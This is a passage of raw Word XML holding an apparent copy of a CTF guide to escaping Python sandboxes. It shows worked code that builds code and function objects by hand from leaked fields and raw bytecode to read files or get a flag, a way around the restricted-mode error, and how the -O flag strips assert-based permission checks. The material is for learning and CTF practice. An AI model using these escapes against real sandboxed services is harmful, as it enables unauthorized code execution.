        <w:t xml:space="preserve"> is what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you will need to leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6D005" w14:textId="0A1E6C70" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C72577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fc = get_flag.__code__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4EAF3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In a real situation the values like fc.co_argcount are the ones you need to leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE61FE7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code_obj = code_type(fc.co_argcount, fc.co_kwonlyargcount, fc.co_nlocals, fc.co_stacksize, fc.co_flags, fc.co_code, fc.co_consts, fc.co_names, fc.co_varnames, fc.co_filename, fc.co_name, fc.co_firstlineno, fc.co_lnotab, cellvars=fc.co_cellvars, freevars=fc.co_freevars)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D62C088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2080CC31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mydict = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082642C7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mydict['__builtins__'] = __builtins__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC9101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function_type(code_obj, mydict, None, None, None)("secretcode")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB39C7F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#ThisIsTheFlag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B877267" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Bypass Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563CB115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In previous examples at the beginning of this post, you can see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 xml:space="preserve">how to execute any python code using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>compile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 xml:space="preserve"> function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is interesting because you can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execute whole scripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with loops and everything in a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one liner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and we could do the same using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">). Anyway, sometimes it could be useful to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create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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compiled object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a local machine and execute it in the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CTF machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for example because we don't have the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>compiled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> function in the CTF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71626065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For example, let's compile and execute manually a function that reads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>./poc.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661906DD" w14:textId="4F37C74B" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69293602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#Locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09CFE1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def read():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C78CCD2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return open("./poc.py",'r').read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156654A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5A7888EB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lastRenderedPageBreak/>
        <w:t>read.__code__.co_code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2992AF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't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED3252" w14:textId="615527A0" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB0391A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#On Remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B4E98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function_type = type(lambda: None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E53073D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code_type = type((lambda: None).__code__) #Get &lt;type 'type'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5249B030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consts = (None, "./poc.py", 'r')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF8F32F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bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96326F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names = ('open','read')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69199693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15B285D5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 And execute it using eval/exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC4FC97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eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '&lt;module&gt;', 1, '', (), ()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1B203F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</w:p>
    <w:p w14:paraId="27B0E03D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#You could also execute it directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797455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mydict = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C423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mydict['__builtins__'] = __builtins__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359544D9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codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '&lt;module&gt;', 1, '', (), ())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7EFEE4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function_type(codeobj, mydict, None, None, None)()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505444D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If you cannot access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you could create a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proper function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, but calling it directly is usually going to fail with: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>constructor not accessible in restricted mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. So you need a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function not in the restricted environment to call this function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2619FECA" w14:textId="55622F2C" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E50436E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#Compile a regular print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7837A7B4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ftype = type(lambda: None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A298EF1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ctype = type((lambda: None).func_code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775D726A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f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB358E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f(42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E427BE6" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Decompiling Compiled Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5798154C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Using tools like </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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https://www.decompiler.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> one can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decompile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> given compiled python code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0075F06F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Check out this tutorial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47959469" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="uppercase"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>PAGE</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="text-base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Decompile compiled python binaries (exe, elf) - Retreive from .pyc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="506B61ED" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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lastRenderedPageBreak/>
        <w:t>Misc Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4298A7F9" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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Assert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7570E45B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Python executed with optimizations with the param </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>-O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> will remove asset statements and any code conditional on the value of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Therefore, checks like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F55C4A" w14:textId="6D3C53C5" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE245A6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>def check_permission(super_user):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C969EB6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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795388CD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assert(super_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B414C4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print("\nYou are a super user\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8D5315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except AssertionError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B92917" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ml-3"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(f"\nNot a Super User!!!\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756A36BC" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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will be bypassed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2D345" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2FB30A" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://lbarman.ch/blog/pyjail/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FF47094" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F8FD7FA" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C5D4F30" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://gynvael.coldwind.pl/n/python_sandbox_escape</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42B3B536" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId29" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="033BAB1E" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId30" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F846A54" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98"/>
    <w:sectPr w:rsidR="00BD7C98">
      <w:footerReference w:type="even" r:id="rId31"/>
      <w:footerReference w:type="default" r:id="rId32"/>
      <w:footerReference w:type="firs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0EAF4" w14:textId="77777777" w:rsidR="0069718F" w:rsidRDefault="0069718F" w:rsidP="00BD7C98">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6E48F8BB" w14:textId="77777777" w:rsidR="0069718F" w:rsidRDefault="0069718F" w:rsidP="00BD7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mono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099D5" w14:textId="5D598B13" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C9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394F30" wp14:editId="2DF3AF2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2" name="Text Box 2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E8C401" w14:textId="64B3FCD4" w:rsidR="00BD7C98" w:rsidRPr="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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BD7C98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394F3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08E8C401" w14:textId="64B3FCD4" w:rsidR="00BD7C98" w:rsidRPr="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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BD7C98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62452" w14:textId="6D541C88" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C9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ED76EBD" wp14:editId="745001C3">
              <wp:simplePos x="914400" y="1007364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3" name="Text Box 3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0E35FF" w14:textId="323A633C" w:rsidR="00BD7C98" w:rsidRPr="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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BD7C98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D76EB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6E0E35FF" w14:textId="323A633C" w:rsidR="00BD7C98" w:rsidRPr="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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BD7C98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23067" w14:textId="6A92EDBB" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C9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1B71F4A" wp14:editId="537BFB3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1" name="Text Box 1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85CFB0" w14:textId="1F7D7E03" w:rsidR="00BD7C98" w:rsidRPr="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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BD7C98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B71F4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ener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6385CFB0" w14:textId="1F7D7E03" w:rsidR="00BD7C98" w:rsidRPr="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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BD7C98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95AB8" w14:textId="77777777" w:rsidR="0069718F" w:rsidRDefault="0069718F" w:rsidP="00BD7C98">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="089506FA" w14:textId="77777777" w:rsidR="0069718F" w:rsidRDefault="0069718F" w:rsidP="00BD7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56A26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09A6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F03362"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F55C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9310410">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1492796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DB0"/>
    <w:rsid w:val="00240D72"/>
    <w:rsid w:val="0069718F"/>
    <w:rsid w:val="00835E55"/>
    <w:rsid w:val="00845DCA"/>
    <w:rsid w:val="00B55EC5"/>
    <w:rsid w:val="00BD7C98"/>
    <w:rsid w:val="00EB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DAD15"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB69D412-81F1-406F-AC18-A4E67D07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7C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C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C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7C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D7C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C98"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BD7C9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D7C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7C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D7C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BD7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ax-w-3xl">
    <w:name w:val="max-w-3xl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BD7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D7C9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7C98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C9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D7C98"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="grid">
    <w:name w:val="grid"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD7C98"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ml-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD7C98"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00BD7C98"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="leading-normal">
    <w:name w:val="leading-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BD7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flex">
    <w:name w:val="flex"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD7C98"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="uppercase">
    <w:name w:val="uppercase"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD7C98"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-base">
    <w:name w:val="text-base"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD7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1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3154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845506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21463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24847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315532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116277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31696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86368728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33267917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171906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37423141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660725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218368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6" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1447362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205851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49075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920193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8267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0859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20792849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319547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017225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48910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497773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285202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10691089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563893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82425337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647708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36513066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47634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92434419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44614181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024992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3019749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02899427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446232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88686018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279512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9548963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806493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1780587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571436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30042409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562962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45206495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056220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111141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649828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54744419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485722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78979847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11287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4712662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046971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14713512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296852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62627111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83463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0301288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69489197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803645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4281186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201448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19727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355408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213297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353157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39400371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75986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60096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3730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82939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33952821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974651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1884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10851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252862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42103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695639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345007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57560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037412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1218113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45341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1487976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189828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62040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0564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288924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19548649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980627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91483074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912730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15238543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571925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45901445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30088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5638903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191716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21631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58142315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088906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4032889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508890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087614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41545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068926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90384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62204752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31076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84718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62618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77872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53599419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765682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701023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075856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30949895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81386713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61115272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42637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74535687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503200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006244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3406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250979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223356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891653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obile.twitter.com/_nag0mez" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escap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owardsdatascience.com/understanding-python-bytecode-e7edaae8734d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docs.python.org/3/reference/datamodel.html" TargetMode="External"/><Relationship Id="rId17" 